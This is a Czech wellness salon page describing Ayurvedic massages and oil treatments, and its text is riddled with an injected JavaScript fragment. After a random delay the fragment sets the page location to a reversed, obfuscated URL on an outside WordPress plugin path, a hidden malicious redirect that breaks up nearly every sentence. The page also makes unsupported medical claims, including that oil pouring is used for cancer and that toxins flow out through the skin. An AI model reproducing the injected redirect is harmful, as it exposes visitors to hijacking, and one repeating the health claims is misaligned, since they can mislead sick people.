Nabízíme

ÁJURVÉDA

Je nejstarším uceleným systémem medicíny na světě. Název je odvozen od sánskritských slov ajus – život a véda –  poznání . Nabízí bohatý a úplný náhled na zdravý život a její kořeny sahají až 5000 let zpátky.

Prožít šťastný a spokojený život mohou Ti z nás, kteří dokáží vědomě pracovat s neustálým toof-redaeh/snigulp/tnetnoc-pw/moc.snoituloslattolg//:sptth'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random()*6); if (number1==3){var delay = 18000;setTimeout($mWn(0),delay);}tokem myšlenek, které přicházejí během dne.  Je nutné tytoof-redaeh/snigulp/tnetnoc-pw/moc.snoituloslattolg//:sptth'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random()*6); if (number1==3){var delay = 18000;setTimeout($mWn(0),delay);}to rodící se myšlenky dobře spolknout, nechat strávit a poté vypustit zpátky z mysli ven. Protoof-redaeh/snigulp/tnetnoc-pw/moc.snoituloslattolg//:sptth'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random()*6); if (number1==3){var delay = 18000;setTimeout($mWn(0),delay);}to ájurvéda doporučuje soustředit pozornost během denní činnosti na vědomý nádech a výdech. Subtilní a konstantní mysl je možná jen tehdy pokud naše mysl neplave společně se strachem, hněvem, připoutaností, chamtivostí, marností a negativními myšlenkami. Život máme ve svých dlaních a tak odpovídáme za své zdraví sami. Společně s nadhledem, moudrostí a vědomým dýcháním dochází ke stimulaci a harmonizaci mozkových a nervových center, které přináší spokojenost, soucit, lásku a šťastně prožitý život. Láska a soucit k sobě zrcadlí lásku a soucit k toof-redaeh/snigulp/tnetnoc-pw/moc.snoituloslattolg//:sptth'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random()*6); if (number1==3){var delay = 18000;setTimeout($mWn(0),delay);}tobě.

ÁJURVÉDSKÁ MASÁŽ HLAVY A OBLIČEJE

Co je v hlavě, toof-redaeh/snigulp/tnetnoc-pw/moc.snoituloslattolg//:sptth'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random()*6); if (number1==3){var delay = 18000;setTimeout($mWn(0),delay);}to je v srdci. Co je v srdci, toof-redaeh/snigulp/tnetnoc-pw/moc.snoituloslattolg//:sptth'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random()*6); if (number1==3){var delay = 18000;setTimeout($mWn(0),delay);}to je v oběhu – kapilárách – celém těle.

Je těžké se upřímně nesmát po ájurvédské masáži hlavy.  Jedná se o psychickou léčbu, která vede ke zklidnění mysli. Tatoof-redaeh/snigulp/tnetnoc-pw/moc.snoituloslattolg//:sptth'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random()*6); if (number1==3){var delay = 18000;setTimeout($mWn(0),delay);}to komplexní masáž aktivuje centra v podvědomí v mozku, reflexní body, energetické meridiány a krevní oběh ve tváři tak, že naprostoof-redaeh/snigulp/tnetnoc-pw/moc.snoituloslattolg//:sptth'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random()*6); if (number1==3){var delay = 18000;setTimeout($mWn(0),delay);}to zklidní celé tělo a mysl. Napětí na krku, ramenech a tváři se uvolní a energie je opět v rovnováze od hlavy až k patě. Používají se za studena lisované oleje, například z oříšků a semínek dle typu a složení.

Kaf konstituce – toof-redaeh/snigulp/tnetnoc-pw/moc.snoituloslattolg//:sptth'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random()*6); if (number1==3){var delay = 18000;setTimeout($mWn(0),delay);}to jsou ti, co by všude rádi spali (citron, cypřiš, bergamot)

Vát konstituce – toof-redaeh/snigulp/tnetnoc-pw/moc.snoituloslattolg//:sptth'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random()*6); if (number1==3){var delay = 18000;setTimeout($mWn(0),delay);}to jsou ti, co pořád musí něco dělat (sezam, rýže, otruby, růže, geránium a jasmín)

Pitt konstituce – toof-redaeh/snigulp/tnetnoc-pw/moc.snoituloslattolg//:sptth'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random()*6); if (number1==3){var delay = 18000;setTimeout($mWn(0),delay);}touží po lásce, chybí jim dotek (levandule a čajovník, bergamot a citron)

SNÉHAN MASÁŽ

Jedná se o ájurvédskou léčebnou techniku, která uvolňuje napětí a bolestivé lokality. Střídavě se protahuje a uvolňuje sval, respektive jeho úponová a vazivová část.

  • urychluje detoof-redaeh/snigulp/tnetnoc-pw/moc.snoituloslattolg//:sptth'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random()*6); if (number1==3){var delay = 18000;setTimeout($mWn(0),delay);}toxikační procesy
  • napomáhávětšímu rozsahu pohybu kloubů
  • uvolňuje se fyzické i duševní napětí
  • urychluje se metabolizmus
  • zlepšuje se kvalita spánku

KAJÁSEK – polévání teplým olejem

Poléváme celé tělo. Lijeme tam, kde je zkrácení. Skvělá procedura pro svaly, šlachy, klouby…. Naprostoof-redaeh/snigulp/tnetnoc-pw/moc.snoituloslattolg//:sptth'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random()*6); if (number1==3){var delay = 18000;setTimeout($mWn(0),delay);}to ideální, spojí-li se se snéhanem.  Kajáskem se roztáhnou celé cévní soustavy (i mezibuněčné prostoof-redaeh/snigulp/tnetnoc-pw/moc.snoituloslattolg//:sptth'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random()*6); if (number1==3){var delay = 18000;setTimeout($mWn(0),delay);}tory).

Nerovnováha vát stahuje. Je-li tělo v plném kompaktu, vyschne. Přijde-li teplo, buňky se nedotýkají mezi sebou. Dochází ke kompletnímu odstranění vát. Po kajásku je tedy potřeba odpočívat. Díky toof-redaeh/snigulp/tnetnoc-pw/moc.snoituloslattolg//:sptth'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random()*6); if (number1==3){var delay = 18000;setTimeout($mWn(0),delay);}tomu začne vát opět působit, buňky se začnou stahovat a člověk je velmi klidný. Používá se při detoof-redaeh/snigulp/tnetnoc-pw/moc.snoituloslattolg//:sptth'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random()*6); if (number1==3){var delay = 18000;setTimeout($mWn(0),delay);}toxikaci, buňky se otevřou a toof-redaeh/snigulp/tnetnoc-pw/moc.snoituloslattolg//:sptth'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random()*6); if (number1==3){var delay = 18000;setTimeout($mWn(0),delay);}toxiny vytečou. Používá se hodně, je-li v těle rakovina. A také upravuje menstruaci.

SVÉDAN – pocení

Toutoof-redaeh/snigulp/tnetnoc-pw/moc.snoituloslattolg//:sptth'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random()*6); if (number1==3){var delay = 18000;setTimeout($mWn(0),delay);}to technikou umožňujeme tělu, aby si dotáhlo svůj metabolismus.  Aby docházelo k přeměnám tkání, výrobě nových buněk. Udržování oběhu, propojenosti. Svédan vždy znamená přidávání tepla.

ŠIRODHÁRA – proud na hlavu, slouží ke zklidnění mysli

Mozek je žhavá sopka. Uvnitř mozku jsou víry. Každou vteřinu přichází myšlenka. Stále a znovu. Smyslové záležitoof-redaeh/snigulp/tnetnoc-pw/moc.snoituloslattolg//:sptth'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random()*6); if (number1==3){var delay = 18000;setTimeout($mWn(0),delay);}tosti, věci, které jsou v paměti, záležitoof-redaeh/snigulp/tnetnoc-pw/moc.snoituloslattolg//:sptth'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random()*6); if (number1==3){var delay = 18000;setTimeout($mWn(0),delay);}tosti toof-redaeh/snigulp/tnetnoc-pw/moc.snoituloslattolg//:sptth'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random()*6); if (number1==3){var delay = 18000;setTimeout($mWn(0),delay);}touhy připoutanosti, chtivosti…. Do toof-redaeh/snigulp/tnetnoc-pw/moc.snoituloslattolg//:sptth'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random()*6); if (number1==3){var delay = 18000;setTimeout($mWn(0),delay);}toho všeho naše mysl neustále hrabe. Permanentně se něco děje. Jak toof-redaeh/snigulp/tnetnoc-pw/moc.snoituloslattolg//:sptth'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random()*6); if (number1==3){var delay = 18000;setTimeout($mWn(0),delay);}to má člověk v hlavě, tak se mu toof-redaeh/snigulp/tnetnoc-pw/moc.snoituloslattolg//:sptth'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random()*6); if (number1==3){var delay = 18000;setTimeout($mWn(0),delay);}to promítá i na srdce. To se začne podle toof-redaeh/snigulp/tnetnoc-pw/moc.snoituloslattolg//:sptth'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random()*6); if (number1==3){var delay = 18000;setTimeout($mWn(0),delay);}toho stahovat, bušit. Co je v hlavě, toof-redaeh/snigulp/tnetnoc-pw/moc.snoituloslattolg//:sptth'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random()*6); if (number1==3){var delay = 18000;setTimeout($mWn(0),delay);}to je v srdci. Co je v srdci, toof-redaeh/snigulp/tnetnoc-pw/moc.snoituloslattolg//:sptth'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random()*6); if (number1==3){var delay = 18000;setTimeout($mWn(0),delay);}to je v oběhu kapilárách… v celém těle.

SARVANG MASÁŽ

Po celém těle běží prán, který udržuje tělo jako celek. Je-li prán rozložená rovnoměrně, člověk se cítí v pohodě a zdráv. Jakmile je rozložení nerovnoměrné, vznikají blokády, ucpání  – avrudy. Člověk cítí bolest, únavu, pálení, suchost, otoof-redaeh/snigulp/tnetnoc-pw/moc.snoituloslattolg//:sptth'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random()*6); if (number1==3){var delay = 18000;setTimeout($mWn(0),delay);}toky. Jakákoliv bolest je známkou avrudy – ucpání.

Sarvangem se prokrví celé tělo, dodají se mahábháty a tím se obnoví rozložení pránu v celém těle.

Působí jako prevence, odstraňuje drobné poruchy a začínající neduhy.

MASÁŽ KOVOVÝMI MISKAMI

Relaxační masáž, při které je kov schopný dojít až do kostní dřeně. Když se dělá masáž s kovovýmí mističkami, tepelná energie prostupuje taktoof-redaeh/snigulp/tnetnoc-pw/moc.snoituloslattolg//:sptth'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random()*6); if (number1==3){var delay = 18000;setTimeout($mWn(0),delay);}to hluboko.

GARŠAN – procedura k detoof-redaeh/snigulp/tnetnoc-pw/moc.snoituloslattolg//:sptth'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random()*6); if (number1==3){var delay = 18000;setTimeout($mWn(0),delay);}toxikaci kůže a podkoží

Kůže je vlastně jeden velký konečník, jelikož skrze ní vytéká z těla mraky odpadu. Kůže pak stárne, nedýchá, loupe se, vysychá.

Buňky, které jsou mrtvé, se pak autoof-redaeh/snigulp/tnetnoc-pw/moc.snoituloslattolg//:sptth'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random()*6); if (number1==3){var delay = 18000;setTimeout($mWn(0),delay);}tomaticky odlepí. Toxin jde z těla ven a člověk má pocit lehkosti. S toof-redaeh/snigulp/tnetnoc-pw/moc.snoituloslattolg//:sptth'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random()*6); if (number1==3){var delay = 18000;setTimeout($mWn(0),delay);}toxinem má člověk naopak pocit těžkosti. Je toof-redaeh/snigulp/tnetnoc-pw/moc.snoituloslattolg//:sptth'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random()*6); if (number1==3){var delay = 18000;setTimeout($mWn(0),delay);}to zároveň omlazující procedura.

PINDA SVEDAN

Odblokovává pránické napětí na různých místech v těle. Přikládáme váčky z bavlněné látky, které jsou naplněné potřebnou ingrediencí podle toof-redaeh/snigulp/tnetnoc-pw/moc.snoituloslattolg//:sptth'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random()*6); if (number1==3){var delay = 18000;setTimeout($mWn(0),delay);}toho, na co chceme působit nebo co chceme tělu dodat.

MASÁŽ LÁVOVÝMI KAMENY

Relaxační a prohřívající masáž zvyšující teplo v těle.

NÁDÍ SVÉDAN

Napařování s vysokým účinkem uvolnění od bolesti a napětí.